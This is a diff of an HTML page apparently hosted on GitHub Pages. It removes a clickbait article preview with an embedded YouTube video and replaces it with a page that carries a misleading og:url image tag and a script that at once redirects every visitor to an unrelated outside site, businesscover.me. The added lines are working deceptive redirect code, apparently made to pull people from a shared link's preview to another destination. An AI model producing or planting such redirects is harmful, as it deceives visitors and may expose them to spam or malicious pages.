--- a/jakesaaath.HTML
+++ b/jakesaaath.HTML
@@ -1,11 +1,6 @@
-<meta property="og:type" content="Article" />
-	<meta property="og:url" content="https://Priyakumarii.github.io/priya/jakesaaath.HTML" />
-	<meta property="og:site_name" content="Github" />
-	<meta property="og:title" content="Kia kisi janwar ke saath aisa hona chahiye" />
-	<meta property="og:image" content="https://i.imgur.com/48aoyiA.jpg" /> 
-	<meta property="og:description" content="Kia kisi janwar ke saath aisa hona chahiye" />
-	<html>
-			<head></head>
-			<body>
-			<iframe width="340" height="190" src="https://www.youtube.com/embed/Trg7AHzCApc?rel=0&amp;controls=0&amp;showinfo=0" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
-			</body></html>
+<html>
+<head>
+<meta property="og:url" content="https://i.imgur.com/4sqCEwh.jpg" />
+<script type="text/javascript">window.location = "http://businesscover.me/8592342-2/";</script>
+</head>
+</html>
